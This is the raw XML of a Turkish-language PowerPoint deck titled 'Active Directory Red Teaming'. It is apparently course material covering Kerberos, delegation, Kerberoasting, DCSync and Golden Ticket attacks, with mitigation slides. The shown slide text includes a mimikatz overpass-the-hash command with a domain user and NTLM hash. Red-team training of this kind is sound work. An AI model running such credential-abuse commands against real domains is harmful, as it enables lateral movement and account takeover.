              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /user:root123@INTERNAL.LOCAL" "exit"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716285-CED9-24C5-2F82-A32D540E6D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505198" y="2904490"/>
            <a:ext cx="5181600" cy="29794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137069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4746-114E-6F44-88D8-B0B4A8346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TTP 0x20 – Unconstrained Delegation w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Spoolsvc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DDD1579-B435-8D7D-6BEF-680AAB9AE5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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Over PTH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yetkili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oluşturuluyor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.\mimikatz.exe "privilege::debug" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>pth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /user:root123 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domain:INTERNAL.LOCAL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /ntlm:e373a37628b7d857b072c301c3cac9d4" "exit"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="A blue screen with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67A771A-0512-0476-4ED7-4403204D56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09674" y="2910938"/>
            <a:ext cx="9244013" cy="3212291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079B0C-C162-63E9-BC0F-C71A35090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370" y="4307036"/>
            <a:ext cx="4597636" cy="181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35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3549</TotalTime>
  <Words>4976</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>485</Paragraphs>
  <Slides>93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8" baseType="lpstr">
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Active Directory Red Teaming</vt:lpstr>
      <vt:lpstr>Ajanda</vt:lpstr>
      <vt:lpstr>Ajanda</vt:lpstr>
      <vt:lpstr>Active Directory Temelleri</vt:lpstr>
      <vt:lpstr>Active Directory</vt:lpstr>
      <vt:lpstr>Mantıksal Birimler ve Obje Türleri </vt:lpstr>
      <vt:lpstr>Mantıksal Birimler ve Obje Türleri </vt:lpstr>
      <vt:lpstr>Önemli Not – Bilgisayar Hesapları </vt:lpstr>
      <vt:lpstr>Mantıksal Birimler ve Obje Türleri </vt:lpstr>
      <vt:lpstr>Önemli Not – GPO’ların İşlenmesi </vt:lpstr>
      <vt:lpstr>Önemli Not – Group Policy Object Dosyaları </vt:lpstr>
      <vt:lpstr>Yetkili ve Admin Objeler</vt:lpstr>
      <vt:lpstr>Yetkili ve Admin Objeler </vt:lpstr>
      <vt:lpstr>Önemli Not – Gruplarda Yetki Aktarımı </vt:lpstr>
      <vt:lpstr>Uygulama #1 </vt:lpstr>
      <vt:lpstr>ACE ve ACL Yapıları </vt:lpstr>
      <vt:lpstr>Önemli Not – ACE/ACL Backdoor </vt:lpstr>
      <vt:lpstr>Uygulama #2 </vt:lpstr>
      <vt:lpstr>LMHash</vt:lpstr>
      <vt:lpstr>NTHash</vt:lpstr>
      <vt:lpstr>NTHash</vt:lpstr>
      <vt:lpstr>Kimlik Doğrulama Protokolleri </vt:lpstr>
      <vt:lpstr>Service Principal Name </vt:lpstr>
      <vt:lpstr>Önemli Not – Kerberos SPN Kullanımı </vt:lpstr>
      <vt:lpstr>Önemli Not – Kerberos SPN Kullanımı </vt:lpstr>
      <vt:lpstr>Kerberos</vt:lpstr>
      <vt:lpstr>Kerberos</vt:lpstr>
      <vt:lpstr>Önemli Not – Kerberos Authorization </vt:lpstr>
      <vt:lpstr>Önemli Not – Roasting Saldırıları </vt:lpstr>
      <vt:lpstr>Uygulama #3 </vt:lpstr>
      <vt:lpstr>Kerberos Double Hop Sorunu </vt:lpstr>
      <vt:lpstr>Unconstrained Delegation</vt:lpstr>
      <vt:lpstr>Unconstrained Delegation</vt:lpstr>
      <vt:lpstr>Önemli Not – Unconstrained Delegation Zafiyeti </vt:lpstr>
      <vt:lpstr>Constrained Delegation</vt:lpstr>
      <vt:lpstr>Constrained Delegation</vt:lpstr>
      <vt:lpstr>Uygulama #4 </vt:lpstr>
      <vt:lpstr>NTLM</vt:lpstr>
      <vt:lpstr>NTLM</vt:lpstr>
      <vt:lpstr>Trust Yapıları </vt:lpstr>
      <vt:lpstr>Trust Yapıları</vt:lpstr>
      <vt:lpstr>Uygulama #5 </vt:lpstr>
      <vt:lpstr>Bilgi Toplama</vt:lpstr>
      <vt:lpstr>Powershell</vt:lpstr>
      <vt:lpstr>Önemli Not – Powershell </vt:lpstr>
      <vt:lpstr>Powershell – Active Directory Module </vt:lpstr>
      <vt:lpstr>Uygulama #6 </vt:lpstr>
      <vt:lpstr>Powershell – Active Directory Module </vt:lpstr>
      <vt:lpstr>Powershell – Active Directory Module </vt:lpstr>
      <vt:lpstr>Powershell – Active Directory Module </vt:lpstr>
      <vt:lpstr>Powershell – Active Directory Module </vt:lpstr>
      <vt:lpstr>Powershell – Active Directory Module </vt:lpstr>
      <vt:lpstr>Powershell – Active Directory Module </vt:lpstr>
      <vt:lpstr>Uygulama #7 </vt:lpstr>
      <vt:lpstr>LDAP</vt:lpstr>
      <vt:lpstr>BloodHound - SharpHound</vt:lpstr>
      <vt:lpstr>BloodHound - SharpHound</vt:lpstr>
      <vt:lpstr>Uygulama #8 </vt:lpstr>
      <vt:lpstr>Önemli Not – Bilgi Toplama </vt:lpstr>
      <vt:lpstr>LATERAL MOVEMENT PRIVILEGE ESCALATION</vt:lpstr>
      <vt:lpstr>TTP 0x0 – Rogue Machine Account </vt:lpstr>
      <vt:lpstr>TTP 0x0 – Rogue Machine Account </vt:lpstr>
      <vt:lpstr>TTP 0x0 – Rogue Machine Account - Mitigation </vt:lpstr>
      <vt:lpstr>Uygulama #9</vt:lpstr>
      <vt:lpstr>Roasting</vt:lpstr>
      <vt:lpstr>TTP 0x6 – Kerberoasting </vt:lpstr>
      <vt:lpstr>TTP 0x6 – Kerberoasting </vt:lpstr>
      <vt:lpstr>TTP 0x6 – Kerberoasting </vt:lpstr>
      <vt:lpstr>TTP 0x6 – Kerberoasting - Exploitation </vt:lpstr>
      <vt:lpstr>TTP 0x6 – Kerberoasting - Exploitation </vt:lpstr>
      <vt:lpstr>TTP 0x6 – Kerberoasting - Exploitation </vt:lpstr>
      <vt:lpstr>TTP 0x6 – Kerberoasting - Mitigation </vt:lpstr>
      <vt:lpstr>TTP 0x12 – Pass the Ticket</vt:lpstr>
      <vt:lpstr>TTP 0x12 – Pass the Ticket</vt:lpstr>
      <vt:lpstr>TTP 0x12 – Pass the Ticket</vt:lpstr>
      <vt:lpstr>TTP 0x13 – DCSync </vt:lpstr>
      <vt:lpstr>TTP 0x13 – DCSync </vt:lpstr>
      <vt:lpstr>TTP 0x13 – DCSync - Exploitation </vt:lpstr>
      <vt:lpstr>TTP 0x18 – Golden Ticket w/ SIDHistory </vt:lpstr>
      <vt:lpstr>TTP 0x18 – Golden Ticket w/ SIDHistory </vt:lpstr>
      <vt:lpstr>TTP 0x18 – Golden Ticket w/ SIDHistory </vt:lpstr>
      <vt:lpstr>TTP 0x18 – Golden Ticket w/ SIDHistory </vt:lpstr>
      <vt:lpstr>TTP 0x18 – Golden Ticket w/ SIDHistory - Exploitation </vt:lpstr>
      <vt:lpstr>TTP 0x18 – Golden Ticket w/ SIDHistory - Exploitation </vt:lpstr>
      <vt:lpstr>TTP 0x18 – Golden Ticket w/ SIDHistory - Mitigation </vt:lpstr>
      <vt:lpstr>TTP 0x20 – Unconstrained Delegation w/ Spoolsvc </vt:lpstr>
      <vt:lpstr>TTP 0x20 – Unconstrained Delegation w/ Spoolsvc </vt:lpstr>
      <vt:lpstr>TTP 0x20 – Unconstrained Delegation w/ Spoolsvc </vt:lpstr>
      <vt:lpstr>TTP 0x20 – Unconstrained Delegation w/ Spoolsvc </vt:lpstr>
      <vt:lpstr>TTP 0x20 – Unconstrained Delegation w/ Spoolsvc</vt:lpstr>
      <vt:lpstr>TTP 0x20 – Unconstrained Delegation w/ Spoolsvc</vt:lpstr>
      <vt:lpstr>TTP 0x20 – Unconstrained Delegation w/ Spoolsvc</vt:lpstr>
      <vt:lpstr>TTP 0x20 – Unconstrained Delegation w/ Spoolsvc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Nadir  Sensoy</dc:creator>
  <cp:lastModifiedBy>Nadir  Sensoy</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-18T13:14:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-24T14:32:13Z</dcterms:modified>
</cp:coreProperties>
</file>